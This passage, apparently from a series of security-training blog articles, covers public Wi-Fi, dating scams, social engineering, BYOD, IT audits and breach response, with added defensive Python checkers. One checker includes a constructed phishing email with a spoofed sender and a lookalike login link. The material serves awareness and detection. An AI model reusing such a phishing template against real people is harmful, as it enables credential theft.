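On the constructed scan, the open copy of CoffeeShop_Guest and the open HomeNet are flagged, the open "Free Wi-Fi" is flagged as bait, and the encrypted Library network produces nothing. The BSSID check is deliberately marked lower confidence: a venue that adds a second access point triggers it too, so treat it as corroboration rather than proof.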

 

What are the Measures you can take to ensure your safety on a Public Wi-Fi?

  1. Accessing sensitive information over public Wi-Fi: As a matter of policy, I always advise people never to use public Wi-Fi to access sensitive information. If you must access sensitive data, switch to your own mobile data or ask someone you trust to share their device's hotspot with you. Public Wi-Fi is fine for things that are not sensitive, such as looking up directions or searching Google, Bing or Yahoo. Paying bills or shopping online can wait. If the situation is genuinely urgent, use a VPN (Virtual Private Network). There are plenty of VPN services online; if you need a good one, expect to pay for it, and choose a reputable provider.
  2. Use a VPN (Virtual Private Network): If you need to work over public Wi-Fi and your company or organisation offers VPN access, use it. A VPN gives you a private, encrypted tunnel for your traffic, adding an extra layer of security to your connection.
  3. Visit HTTPS sites only: On public Wi-Fi, avoid websites served over plain HTTP (not protected or secure) and stick to websites whose address begins with https://.

Why? Whether or not you are an IT expert, you should know that HTTPS encrypts the traffic between your browser and the website, which makes browsing far safer. If you connect to an unencrypted HTTP site, anyone snooping on the network can read your traffic.
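The HTTP-instead-of-HTTPS sign is easiest to reason about as a property of the chain of redirects your browser followed: a typed `http://` address that is immediately redirected to `https://` is normal, but a page whose content is actually served over `http://`, a hop that goes from HTTPS back to HTTP, or a final host that is not the site you asked for, are the symptoms of a stripping or lookalike attack. The function below is an added example, not code from the original article; it works on hand-constructed request chains (no network access), with placeholder domain names.

```python
"""Audit a browser's observed request chain for the HTTP-downgrade sign
described above.

Added example, not code from the original article. The request chains below
are constructed by hand (no network access); each hop is (url, status, headers)
as the client saw it. The domain names are placeholders.
"""
from urllib.parse import urlsplit


def audit_redirect_chain(chain, expected_host):
    """Return a list of findings for a visit that should end on expected_host over HTTPS."""
    findings = []
    schemes = [urlsplit(url).scheme for url, _, _ in chain]

    for i, (url, status, _) in enumerate(chain):
        # A redirect from http:// to https:// is normal for a typed address;
        # page content *served* (200) over http:// is the SSL-strip symptom.
        if urlsplit(url).scheme == "http" and status == 200:
            findings.append(f"hop {i}: page content served over plaintext HTTP")

    for i in range(1, len(schemes)):
        if schemes[i - 1] == "https" and schemes[i] == "http":
            findings.append(f"hop {i}: downgrade from https to http")

    final_url, _, final_headers = chain[-1]
    final = urlsplit(final_url)
    if final.hostname != expected_host:
        findings.append(f"final host {final.hostname!r} is not {expected_host!r}")

    if final.scheme == "https":
        lower = {k.lower(): v for k, v in final_headers.items()}
        # Without HSTS the next visit can start over http:// again and be stripped.
        if "strict-transport-security" not in lower:
            findings.append("final HTTPS response has no Strict-Transport-Security header")

    return findings


# Constructed sample chains.
SAFE_CHAIN = [
    ("http://bank.example/", 301, {"Location": "https://bank.example/"}),
    ("https://bank.example/", 200, {"Strict-Transport-Security": "max-age=31536000"}),
]
STRIPPED_CHAIN = [  # the MITM answers the http:// request itself and never upgrades
    ("http://bank.example/", 200, {"Content-Type": "text/html"}),
]
LOOKALIKE_CHAIN = [  # redirect lands on a subdomain of the attacker's domain
    ("http://bank.example/", 302, {"Location": "https://bank.example.login-verify.example/"}),
    ("https://bank.example.login-verify.example/", 200, {"Content-Type": "text/html"}),
]

if __name__ == "__main__":
    for name, chain in [("safe", SAFE_CHAIN), ("stripped", STRIPPED_CHAIN), ("lookalike", LOOKALIKE_CHAIN)]:
        print(name, audit_redirect_chain(chain, "bank.example") or ["no findings"])
```

The HSTS check is the practitioner's caveat: even a clean HTTPS visit leaves the next visit exposed if the site does not send Strict-Transport-Security, because the browser will again begin with a plaintext request that an attacker on the same Wi-Fi can answer.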


  4. Consider installing a browser extension such as HTTPS Everywhere, offered by the Electronic Frontier Foundation (EFF), which rewrites requests to use HTTPS wherever the site supports it. Note that the EFF has since retired HTTPS Everywhere because current versions of Firefox and Chrome have a built-in HTTPS-only mode that does the same job; enable that setting in your browser instead.

  5. Configure the wireless settings on your device: Configure your device not to connect automatically to available Wi-Fi hotspots. This is done in the wireless settings of your PC or device; on a PC, simply turn off the "connect automatically" option for saved networks. This prevents your device from joining a public network without you noticing, and it stops the device from broadcasting to the world that it is looking for your "home network", which an attacker can easily spoof.

  6. Use a privacy screen: Attackers are everywhere and will use any means available to obtain your data, including simply looking over your shoulder. Consider using a privacy screen if you must access sensitive information in a public place.

In general, whether you are using a smart device or a PC, do not access sensitive information such as your bank account and financial details over a public Wi-Fi network. Consider all the tips above to keep your information protected online.

Soutech Ventures offers comprehensive information security courses (such as CEH and CISSP) that give more security insights, tools, tips and countermeasures across the different facets of technology. Subscribe to our services today.

Certified Ethical Hacking Training in Abuja, Nigeria

Online Dating: Protect your privacy online - SOUTECH Cyber security Tips

In the past three years, Nigerian singles have flocked to dating sites and social media in search of partners. Online dating has outgrown the stigma it once carried: research by psychologists and counsellors has found that one in ten Nigerian singles has turned to social media and online dating sites, on mobile apps and PCs, to meet people. As the stigma has faded, the popularity of these services has risen, and that popularity has caught the attention of hackers and scammers.

Recently in Nigeria, many hackers and scammers have taken to social media platforms to trick people into giving up sensitive personal information. I have made a personal study of this by reading people's experiences, and it has become a concern for me, which is the reason for this article. Apart from phishing scams and the other vices hackers use against unsuspecting victims, online dating has become one of their tools for playing on people's emotions in order to exploit them.

The intention of this article is not to discuss dating or online dating as such, but to give you tips on how to protect your privacy online.

Privacy Protection Tips

Creating of new user accounts

Create a username that is different from any other username you have ever used. Why? Because a username can be searched easily, and any other account tied to it can then be found; a completely separate username avoids that linkage.

Images and photos uploaded

The same applies to the photos and images you post on your profile. Make sure, as far as possible, that a reverse image search on your dating photos does not lead back to your other accounts; use photos you have not posted anywhere else.

Opening Email accounts

Set up a free email account with a unique name to use only for dating sites. Note that most sites offer in-site messaging that protects your anonymity, so use that rather than your email wherever possible.

Using Free Google voice accounts for Calls

If you must make a phone call, open a free Google Voice account, which gives you a separate phone number, and forward it to your mobile. That way your real phone number stays private while your potential match still has a number on which to reach you.

Use Reputable Online Dating sites

Always research properly and, if you must use one, subscribe to a popular and reputable online dating site. Some sites let you either disable or delete your account; since a disabled account retains your previous information, you can always return to the site later.

Check website privacy policies

Check the site's privacy policy and try to verify how your information is handled. Some sites make profiles and profile pictures public by default, which means they can be indexed by any search engine. One popular site was recently penalised for secretly experimenting with its users' data.

Sites that charge for their communication features have fewer scammers and illegitimate daters, and note that some of these sites also run criminal background screening on their users.

How can online dating scams be spotted?

Now that you know some of the do's and don'ts of online dating sites, let me show you how to spot the scams you may be exposed to.

  • A common trick is for someone to approach you with a story designed to tug at your emotions. An individual adds you and starts telling sad stories such as "I am stranded in a foreign country at the moment, my family has an emergency and needs immediate attention". The end point of the story is always a request for money. As soon as you see this, report the account to the service and block it.
  • Another trick I apply is to request a recent photo of the person I am chatting with in order to verify their identity. If they come up with excuses or start to protest about why they cannot provide a photo, the best thing to do is to step back and apply caution at once.
  • If you have been chatting with and getting familiar with a supposed sweetheart for some time and they avoid any real-life meetings or dates, treat that as a warning sign.
  • Do not open links sent to you by anyone you have not been communicating with, and be careful even with links from the people you chat with frequently. A scammer can pose as a contact and try to get you to click links that redirect you to pornographic or webcam sites, or to sites that serve malware.
  • Be careful about your behaviour and your dress if you engage in any webcam or video chat. A criminal will want to record such sessions in order to blackmail you. Disconnect from any chat or session that makes you uncomfortable.
  • Scammers use bots to run fake profiles whose aim is to get you to click links that redirect you to the unwanted sites described above; some are even built to harvest your credit card details. You can usually spot a bot because it gives a set of predetermined responses. If you are not getting direct replies to what you actually say, there is a good chance you are talking to a bot.

CatFishing

Catfishing is a scam in which a user takes on the identity of another person. Scammers and cybercriminals use it to lure people into online romantic relationships and friendships.

A typical catfisher always has an excuse for why they cannot meet, talk on the phone or do a video or webcam chat. If a profile seems too good to be true, it probably is. What you can do is run a reverse image search on their photo; if the photo turns up under a different name or in a different place from what the profile claims, congratulations, you have caught a catfish.

As a parting word, we are in the internet era, where we can order almost anything online. As in every facet of life there are scammers and tricksters, and scammers and hackers are constantly searching for loopholes to exploit online users. I have always done, and will keep doing, my bit to keep you informed of the techniques they use to trick you. All you have to do is follow the tips in this article and you can stay safe online while keeping your relationships going just fine.

Subscribing to our CEH course at Soutech Ventures gives you an added edge to stay one step ahead of hackers and cybercriminals all over the world.

 

What is Social Engineering? Protect yourself and your organisation from all forms of social engineering - SOUTECH Nigeria

Vulnerabilities in software are widely discussed, but looking at security from the human perspective, human emotions play a large part. When someone is faced with a scary or frightening scenario, their first reaction matters a great deal.

Social engineers leverage this human vulnerability to launch successful attacks on victims. I am going to discuss in detail what social engineering is and its different forms, as this vulnerability is reported to feature in as many as 80% of the techniques cybercriminals use to carry out attacks.

What is Social Engineering?

Social engineering is a technique in which cybercriminals use human interaction to trick users into giving out sensitive information such as personal credentials, or into taking an action (opening an attachment, clicking a link, plugging in a device) that compromises a system.

Types of Social Engineering

Because social engineering leverages human nature and emotions, attackers have developed many techniques to trick users both online and offline. Here are a few you should know about:

Phishing:

Phishing is one of the oldest cyber tricks and has grown into one of the most popular and most successful ways of exploiting computer users. In phishing, cybercriminals try many tricks and methods to get information from you. Increasingly they rely on scare tactics: a supposedly urgent situation that requires your attention, usually involving your bank details or your other online accounts. The user is pushed to make decisions based on fear and on how they feel at the moment the scenario is presented.

Emails that appear to come from a legitimate authority such as your bank or your employer are sent to you requesting your username or password. People tend to react quickly when their finances or jobs are involved, especially when the message appears to come from senior management. I will reiterate that one major phishing tactic is the sense of urgency built into these messages. I have written comprehensively on the forms and techniques of phishing, so you can look that up. Read more on phishing
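The tell-tale signs described above (a sender that only looks like the trusted authority, replies quietly routed elsewhere, urgency language, and links whose visible text disagrees with where they actually go) can be checked directly on a raw message. The script below is an added example and not code from the original article; the two messages it inspects are constructed for illustration, and every address and domain in them is a placeholder.

```python
"""Score an email for the phishing indicators discussed above: a sender whose
display name does not match the real address, a Reply-To pointing elsewhere,
urgency language, and links whose visible text disagrees with their target.

Added example, not code from the original article. The two messages below are
constructed for illustration; all addresses and domains are placeholders.
"""
import email
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

URGENCY_CUES = ("urgent", "immediately", "suspended", "within 24 hours", "verify your account")


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def phishing_indicators(raw_message):
    """Return a list of human-readable indicators found in the raw RFC 822 message."""
    msg = email.message_from_string(raw_message)
    findings = []

    name, from_addr = parseaddr(msg.get("From", ""))
    # Trick 1: a display name that *looks* like the trusted address, e.g.
    # "security@bank.example" <alerts@somewhere-else.example>
    if "@" in name and name.strip().lower() != from_addr.lower():
        findings.append(f"display name {name!r} impersonates an address other than {from_addr!r}")

    # Trick 2: replies silently routed to a different domain.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != _domain(from_addr):
        findings.append(f"Reply-To domain {_domain(reply_addr)!r} differs from From domain {_domain(from_addr)!r}")

    # Trick 3: urgency in the subject or body.
    text = msg.get("Subject", "")
    links = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype not in ("text/plain", "text/html"):
            continue
        body = part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "replace")
        text += "\n" + body
        if ctype == "text/html":
            collector = _LinkCollector()
            collector.feed(body)
            links.extend(collector.links)
    cues = [c for c in URGENCY_CUES if c in text.lower()]
    if cues:
        findings.append(f"urgency language: {', '.join(cues)}")

    # Trick 4: the visible link text shows one host, the href goes to another.
    for href, visible in links:
        href_host = (urlsplit(href).hostname or "").lower()
        if urlsplit(href).scheme == "http":
            findings.append(f"link to {href_host!r} uses plaintext HTTP")
        if visible.startswith(("http://", "https://")):
            shown_host = (urlsplit(visible).hostname or "").lower()
            if shown_host and shown_host != href_host:
                findings.append(f"link text shows {shown_host!r} but points to {href_host!r}")
    return findings


# Constructed sample messages.
SUSPICIOUS = """\
From: "security@bank.example" <alerts@mail-verify.example>
Reply-To: recover@bank-account-help.example
To: victim@example.org
Subject: URGENT: your account will be suspended within 24 hours
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>We detected unusual activity. Verify your account immediately:</p>
<p><a href="http://bank.example.verify-login.example/auth">https://bank.example/login</a></p>
</body></html>
"""

BENIGN = """\
From: Shop Newsletter <news@shop.example>
To: victim@example.org
Subject: This week's offers
Content-Type: text/plain; charset="utf-8"

Hi, here are this week's offers: https://shop.example/offers
"""

if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, phishing_indicators(raw) or ["no indicators"])
```

None of these checks is proof on its own (a legitimate notification can be urgent, and mailing-list software often sets a different Reply-To), which is why the function reports every indicator it finds rather than a single verdict; the combination of a lookalike sender, an off-domain Reply-To, urgency and a mismatched login link is what makes the constructed message unmistakably a phish.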

Baiting

This technique involves a cybercriminal leaving a malware-infected USB stick or other external device in a public or open place. It leverages human curiosity: someone picks up the device and plugs it into their computer to see what is on it, and the malware is delivered to the computer as soon as they do.

Pretexting

In pretexting, the cybercriminal fabricates an emotional story or scenario designed to get to the victim's feelings. The story may be of being stranded in a foreign country, or of being a prince or princess whose father has just passed away and who needs the victim to help with 500 USD or more to reclaim the throne. As I said, these scenarios play on the emotions of victims who want to help. Pretexting is used alongside other methods, since most techniques aim at the victim's emotions, and it is also common for the cybercriminal to impersonate someone over the telephone.

Hacking Emails and Spamming of Contacts

It is human nature to pay attention to family and to people we know. For example, if my brother sends me an email with the subject "Look up this website, you may find something of interest", I would normally not resist opening it. This is why a cybercriminal tries to leverage this technique by obtaining email addresses and passwords. As soon as the victim's credentials are obtained, the cybercriminal takes total control of the account and spams everyone in the victim's contact list. Remember that the main objective of this attack vector is to spread malware, and to trick more people into giving out their personal data.

Vishing

Of all the methods mentioned so far, this technique involves the most human interaction. In vishing (voice phishing), the cybercriminal phones an employee of an organisation pretending to be someone the organisation trusts. They may pose as a representative of the bank or of another high-profile company related to the victim's organisation, proposing to do business with them.

Their aim is to extract as much information as possible from the victim. They may even pose as a fellow employee who has lost or forgotten a password and ask for the victim's password, and they may try to sound legitimate by asking questions that supposedly verify the victim's identity.

Quid Pro Quo

This is also referred to as something-for-something. The technique involves enticing users with prizes, free products or discounts on expensive purchases. The scam is arranged so that the user only gets the reward after completing a form that asks mostly for personal data. The information gathered can then be used for other attacks, such as identity theft.

Spear Phishing

This technique is closely related to phishing and can be thought of as phishing's more sophisticated cousin. In spear phishing, the cybercriminal targets specific employees of an organisation and performs reconnaissance on them online with the aim of gathering personal information.

That information comes from internet searches and from social media profiles. Once they have personal details, they send emails that appear relevant and interesting to the target in order to entice them, so that when the target clicks the link or opens the attachment, the malware is downloaded to their system. Once installed on the user's computer, the malware can spread across the company network to other machines.

Farming

This is more like a long con in which the cybercriminal tries to build a relationship with the target. They typically go through the target's social media profiles to establish that relationship and gather as much information as will help them carry out an attack.

This attack form typically depends on pretexting, because the attacker's aim is to hold prolonged conversations with the target in order to extract as much information as possible.

Hunting

This is the short-form counterpart of the above. The cybercriminal typically uses baiting, phishing and email hacking to extract information from a chosen target with as little direct contact or interaction as possible.

Social engineering now takes every form, both online and offline, so it has become very difficult to control or cut off. Your best defence against social engineering is therefore to educate yourself and, if you run an IT-driven organisation, your employees. Stay aware of the attack methods described above and look out for them.

We have a comprehensive course that can help you learn more about protecting yourself from social engineering and other attack forms. Subscribe to our CEH course at SOUTECH today.

Setting up a Bring-Your-Own-Device (BYOD) policy for your organisation - Be cyber-safe - SOUTECH

In a recent Symantec survey, about three in four small and medium-sized business owners said they had adopted smartphones and tablets as a core part of their teams' work. Since the use of these devices keeps expanding, they need appropriate security. This is the main reason organisations have adopted the bring-your-own-device concept, an approach commonly referred to as BYOD.

The fact that smartphones and tablets are consumer products has led many employees to bring their own devices to work. So I will give you a few tips on staying protected on the internet now that mobile devices have become a core part of many organisations.

A sound and efficient BYOD policy, therefore, is what lets your organisation or company get maximum productivity from these devices without giving up security.

These are a few points I will stress, which are necessities for every organisation:

1. Assessing the needs of your BYOD

One of the key things you can do is to brief your employees and staff and engage them in discussion about how they use their devices for business. The things you need to find out are:

  • Do they access the company server and read work-related email on their devices?
  • Which operating systems and devices do employees use to access the network?

This information will guide your policies, help you dictate their scope and the measures you can take to secure the devices, and help you choose the security software you deploy to protect them.

2. Always educate your employees

Talk to your employees and team members about the potential risks of using mobile devices in and out of the office, and about the importance of managing those risks. Employees must be required to follow security best practices, which include:

  • Using strong, unique passwords (or passcodes) for their devices and for any work-related application accessed from those devices.

These passwords can be set through the device's settings. Learn more about creating strong passwords.

  • Having a password-change policy, for example changing passwords quarterly or every 90 days. Note that current guidance (NIST SP 800-63B) advises against forced periodic rotation unless there is evidence of compromise, since it pushes users toward weak, predictable variations; a better rule is to change a password whenever it may have been exposed. A password manager such as KeePass or LastPass can help employees manage multiple unique passwords and any required changes.
  • Installing system and app updates as soon as the device prompts for them, in order to close known security vulnerabilities.
  • Looking out for phishing text messages and emails, and not clicking links that prompt them to download files or documents from unknown pages.
  • Researching applications thoroughly before installing them. Employees should be discouraged from installing applications from unofficial or third-party app stores.

3. Strong protective measures must be implemented

Explore products that help employees harden their devices when they are used for business. One good tool is Norton Small Business, which protects mobile devices against mobile malware. Research has shown that many Android devices carry potential malware, privacy loopholes and greyware capable of hindering productivity. Newer products also provide remote locate, lock and wipe features, which let mobile users manage the security of their devices from a central web portal. Consider using a VPN (Virtual Private Network) service if employees access the company's network remotely from their mobile devices. A VPN creates an encrypted tunnel across the internet through which the traffic passes, and there are mobile apps that let users connect to a VPN from their smartphones.

4. Acceptable Use should be properly defined

Guidelines should be outlined to clarify and define how employees may use their devices for business purposes during business hours. For instance, you may adopt a permissive policy that allows team members to access documents and emails but prohibits them from accessing sensitive files such as financial data. Websites and apps that must not be accessed over the company VPN during work hours should also be specified.

5. Decide how these Guidelines are Enforced

Set up appropriate consequences for any member of your team who violates the outlined policies. For example, accessing prohibited apps or software during business hours could result in a warning, and anyone who downloads or stores confidential files from a malicious app could lose funding for their mobile device.

These measures should be outlined clearly with how any potential violations will be handled.

If you run a business or an organisation that encourages a BYOD policy, thinking through these steps and a few tips should guide you in building a firm foundation and an effective way to manage your infrastructure and protect it from possible security breaches.

You can learn many more tips on how to better manage your infrastructure, along with proper auditing skills, from SOUTECH Ventures. We offer the best IT consulting solutions to our clients in Abuja, Lagos and Port Harcourt. Subscribe to our Ethical Hacking course and learn more.


Understanding the importance of an IT audit: SOUTECH Ethical hacking tips

An IT audit is the review and evaluation of all automated and non-automated information processing systems and all the interfaces they encompass. It also includes setting up management controls for information technology and infrastructure.

The basic function of an IT audit is to evaluate the systems already in place to guard the organization's information. It examines the organization's ability to protect its assets and to release information legitimately and adequately to authorized parties.

The process of planning an IT audit involves two key steps:

  • Gathering information and planning
  • Gaining an understanding of the already existing internal control structures

Many organizations are gradually moving towards a risk-based audit approach, which is used for risk assessment and helps the IT auditor decide whether to carry out a compliance test or a substantive test. In the risk-based approach the IT auditor relies on the internal and operational controls as well as on knowledge of the organization involved.

This type of risk-assessment decision can go a long way in relating the cost-benefit analysis of a control to the risk it addresses.

These are the five aspects an IT auditor needs to identify when gathering information:

  • Good knowledge of the business and industry
  • Results obtained from previous years' audits
  • Recent financial data
  • Already existing standards and policies
  • Inherent risk assessments

Inherent risk here refers to the risk of an error, possibly significant when combined with other errors encountered during the audit, on the assumption that there are no controls in place.

Once the auditor has gathered the relevant information and has an understanding of the controls, they are ready to start planning and selecting the areas that need auditing.

Why is it important to do an IT Audit?

Hardly will you find an organization today that is not IT driven. Many organisations are investing huge amounts of money in their IT infrastructure because they have realized the tremendous importance of IT in their business services and operations. As a result, they need to make sure at all times that their IT systems are secure, reliable and not susceptible to any form of cyber attack.

The importance of an IT audit cannot be overemphasized: it provides assurance that the IT systems deployed by the organization are well protected, available at all times, properly managed to achieve the required results, and deliver reliable information to users. Many people use and rely on IT without knowing how it works, or that a computer can repeat an error many times over and cause far more extensive damage than a human being can. An IT audit is also very important in reducing the risk of data leakage, data loss, service disruption and mismanagement of the IT infrastructure.

The Objectives of an IT audit

The objectives of an IT audit often focus on substantiating that the existing internal controls are functioning as expected in order to minimize business risk. The objectives include:

  • Assuring compliance with legal and regulatory standards
  • Ensuring confidentiality
  • Ensuring Integrity
  • Improving availability of information systems

Confidentiality relates to information security and refers to protecting information from disclosure to unauthorized persons or parties. This means that information such as personal credentials, trade secrets and bank account statements is kept confidential; protecting such information plays a major role in information security.

Information is valuable only when it has not been tampered with, which is where data integrity comes in: information must not be modified by an unauthorized party. If information is inappropriately altered it can prove costly; for example, a transaction of 1,000 naira could be altered to 10,000 naira. Making sure data is protected from tampering is a core aspect of information security.

Availability means that information is made available to authorized individuals whenever it is needed. Unfortunately, the denial of access to resources for rightful users has been on the rise lately. An information systems audit therefore ensures the confidentiality of an organization's data, its integrity and the availability of resources, and in doing so oversees the organization's IT systems, its operations and its management processes.

The reliability of data from an IT system can also have a huge impact on the financial statements of an organization. Therefore an IT audit must be able to:

  • Check for instances of excess, gross inefficiency and extravagance that amount to wastage of resources in the management of IT systems
  • Ensure a high level of compliance with government laws as applicable to the IT system

Types of IT audits

Different bodies and authorities have developed their own views on how to distinguish the types of IT audits. Goodman and Lawless have outlined three systematic approaches to performing IT audits:

  • Technological Innovation Process Audit: This audit type attempts to construct a risk profile for existing as well as new projects. It assesses the length, depth and presence of the technologies used by the company and how they relate to the relevant markets. It also looks into the way each project is organized, the structure of the industry as regards its projects, products and so on.
  • Technological Position Audit: This audit type deals with the technologies the business has in place and what it needs to add. Technologies can be categorized as:
    • Base
    • Key
    • Pacing
    • Emerging
  • Innovative Comparison Audit: This audit analyses the innovative capabilities of the organization being audited compared to its competitors. The company's research and development facilities as well as its track record of producing new products are examined.

Other authorities have categorized IT audits into five types:

  • Information Processing Facilities: Focused on verifying the processing ability of the facility and whether it is designed to process applications in a timely, accurate and efficient way under both normal and disruptive conditions.
  • Systems and Applications: Focused on verifying that system activities are controlled appropriately, efficiently and adequately so that output at all levels is valid, reliable and timely. A sub-type of this audit focuses on business IT systems and is of particular interest to financial auditors.
  • Management of IT and Enterprise Architecture: Focused on verifying that IT management has developed an organizational structure and procedures that ensure a controlled and efficient information processing environment.
  • Systems Development: Verifies that systems under development meet the requirements and objectives of the organization and that they are developed in line with generally accepted policies and standards for systems development.
  • Client/Server, Intranets, Extranets and Telecommunications: Verifies that telecommunications controls are in place at both the client and the server ends as well as on the network that connects them.

Types of Auditors

  • Internal Auditor: This auditor usually performs internal accounts auditing as well as IS audits.
  • External Auditor: This auditor reviews the internal auditor's findings together with the inputs, processes and outputs of the information systems.

Types of Audits

  • Internal Audits: As explained above, an internal audit considers all the potential controls and hazards in an information system. It takes care of issues such as operations, data, data integrity, security, privacy, software applications, productivity, expenditure, cost control and budgets. The auditor works with guidelines, such as those of the Information Systems Audit and Control Association, which give the work a consistent pattern.
  • External Audits: This audit builds on the information obtained from internal audits of the information systems. An external audit is performed by a certified information systems audit expert.

IT Audit Strategies

  1. We'll discuss two areas here, but first one must be able to determine whether compliance or substantive testing is required. The next thing to consider is how to gather evidence that enables one to perform application audits and report to management.

What is Substantive and Compliance Testing?

  • Compliance testing involves gathering evidence to test whether an organization is following its control procedures. For example, if an organization has a control procedure that says all application changes have to pass through change control, the IT auditor obtains the router's current running configuration as well as the stored configuration file, compares the two to find the differences, and then looks for change control documentation supporting each difference.
  • Substantive testing involves gathering evidence that enables one to evaluate the integrity of individual data and other information. For example, if an organization has a policy of keeping three generations of backup tapes (grandfather, father and son) at an offsite storage location, the IS auditor takes a physical inventory of the tapes at the offsite location, compares it with the organization's inventory, and confirms that all three generations are present and available at the time of the audit.
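The two tests just described, as an added example that is not part of the original article: a compliance test that diffs a running router configuration against the approved baseline and matches each change to a change-control record, and a substantive test that checks the grandfather/father/son tape register against what was physically counted offsite. The configurations, ticket numbers and tape labels are constructed sample data.

```python
"""Compliance and substantive test helpers for an IS audit (added example)."""
import difflib

# Constructed: approved baseline router configuration held by the audit team.
BASELINE_CONFIG = """\
hostname edge-rtr-01
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 no shutdown
ip access-list extended MGMT-IN
 permit tcp 192.0.2.0 0.0.0.255 any eq 22
 deny ip any any
line vty 0 4
 transport input ssh
"""

# Constructed: configuration pulled from the running device during the audit.
RUNNING_CONFIG = """\
hostname edge-rtr-01
interface GigabitEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 no shutdown
ip access-list extended MGMT-IN
 permit tcp 192.0.2.0 0.0.0.255 any eq 22
 permit tcp any any eq 23
 deny ip any any
line vty 0 4
 transport input ssh telnet
"""

# Constructed: change-control records, each listing the exact lines it approved.
CHANGE_CONTROL = {
    "CHG-1042": {"added": {" permit tcp any any eq 23"}, "removed": set()},
}


def config_changes(baseline, running):
    """Return (added, removed) sets of configuration lines between the two configs."""
    diff = difflib.unified_diff(baseline.splitlines(), running.splitlines(),
                                lineterm="", n=0)
    added, removed = set(), set()
    for line in diff:
        if line.startswith(("+++", "---", "@@")):  # skip diff headers
            continue
        if line.startswith("+"):
            added.add(line[1:])
        elif line.startswith("-"):
            removed.add(line[1:])
    return added, removed


def compliance_test(baseline, running, change_records):
    """Map every config change to a change-control record; unmatched changes are findings."""
    added, removed = config_changes(baseline, running)
    approved_added = set().union(*(r["added"] for r in change_records.values()))
    approved_removed = set().union(*(r["removed"] for r in change_records.values()))
    return {
        "authorized": sorted((added & approved_added) | (removed & approved_removed)),
        "unauthorized_added": sorted(added - approved_added),
        "unauthorized_removed": sorted(removed - approved_removed),
    }


# Constructed: the organization's tape register versus the auditor's offsite count.
TAPE_REGISTER = {
    "son": {"BK-2024-W12"},
    "father": {"BK-2024-W08"},
    "grandfather": {"BK-2024-M02"},
}
OFFSITE_INVENTORY = {"BK-2024-W12", "BK-2024-M02"}


def substantive_test(register, offsite):
    """Check that every registered generation is physically present at the offsite location."""
    missing = {gen: sorted(tapes - offsite)
               for gen, tapes in register.items() if tapes - offsite}
    registered = set().union(*register.values())
    return {
        "missing": missing,
        "unregistered": sorted(offsite - registered),
        "all_generations_present": not missing,
    }


if __name__ == "__main__":
    result = compliance_test(BASELINE_CONFIG, RUNNING_CONFIG, CHANGE_CONTROL)
    for key, lines in result.items():
        print(f"{key}:")
        for cfg_line in lines:
            print(f"   {cfg_line.strip()}")
    print(substantive_test(TAPE_REGISTER, OFFSITE_INVENTORY))
```

In the sample, the telnet permit line is covered by a ticket but the change to the vty transport is not, and the father-generation tape is missing offsite; both would go into the audit findings.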
  2. The next thing to discuss is how to obtain the evidence that helps you audit the application and deliver a report to management. Things you can review include:
  • Review the IT organizational structure
  • Review the IT policies and procedures
  • Review the IT standards
  • Review the IT documentation
  • Review the organization's BIA
  • Take time to interview employees
  • Observe the employees' performance
  • Test controls and examine the necessary incorporated entities
  3. Draft a set of questionnaires, for example:
  • Whether there is thorough documentation of an approved IS audit guideline?
  • Whether the IS audit guidelines are consistent with the security policy?
  • Whether responsibility for the IT audit has been assigned to a separate unit that is independent of the IT department?
  • Whether a periodic external IS audit is carried out?
  • Whether an independent security audit is conducted periodically?
  • Whether contingency planning, insurance of assets, data integrity etc. are made part of the external audit?
  • Whether vulnerability and penetration testing were made part of the external audit?
  • Whether the major concerns raised by previous audit reports have been highlighted and brought to the notice of top management?
  • Whether the necessary corrective action has been taken to the satisfaction of management?
  • Whether facilities exist for training that enables the IS audit team to conduct the audit process effectively?
  • Whether the IS audit team is encouraged to keep itself up to date?
  • Whether IS auditors exchange their views and share their experiences internally?

Operations in modern organizations are increasingly dependent on IT, which is why IT audits are used to make sure that all information-related controls and methods are functioning properly. Most companies, if not all, are IT driven, yet not enough awareness has been raised about auditing IT infrastructure, which is the reason for this write-up. If you are in search of a professional firm to audit your organization, look no further: Soutech Web Consults, the number one IT consulting firm in Nigeria, offers this service. Subscribe to us for your auditing and all types of IT-related issues.


Has your account just been hacked? Wondering what to do next?

Just recently it was in the news that over 7 million Dropbox usernames and passwords had been stolen, with initial reports that the Dropbox server itself was hacked. The company made this statement on its blog: "The usernames and passwords that are referenced in these articles were stolen from unrelated services and not Dropbox. Attackers, however, went further to use the stolen credentials to attempt to log in to websites across the internet, including Dropbox".

News of data and network breaches in organizational networks has been making headlines recently, so regardless of where the loopholes are, it is something we hear about frequently. Many high-profile businesses that we interact with regularly, such as restaurants and retailers, have suffered POS (Point of Sale) data breaches over the past months.

Here are a few tips on how to approach a data breach situation and some things you can put in place in case you are faced with one.

What to do Immediately: First Things First

  • First of all, try to determine the kind of data breach your information has been involved in. If it is an online data breach, there is a possibility that your username and password have been stolen; if it is a POS data breach, it means your credit card numbers have been stolen as well.
  • If it is a POS data breach at a store or restaurant where you have recently made a purchase, immediately check your credit card and bank statements for any suspicious activity.
  • Look out for alerts from the vendors you use: as soon as a breached vendor asks customers to change their passwords, do so.
  • Avoid potential phishing emails, especially emails that ask you to update your password and private information via email. One tip is to always check the sender's email address or the web address to confirm it is the official one of your financial institution.
  • Change your other passwords if you reuse the same password across several accounts, particularly the ones linked to your email account and those that contain your private and financial information. I advise you to go through your bank and credit card accounts as well.
  • Always notify your financial institution whenever you notice suspicious activity on your financial account. Make sure you tell them at which breached institution your card was used; they can take immediate action by blocking transactions to that account.

Meanwhile, in the Interim

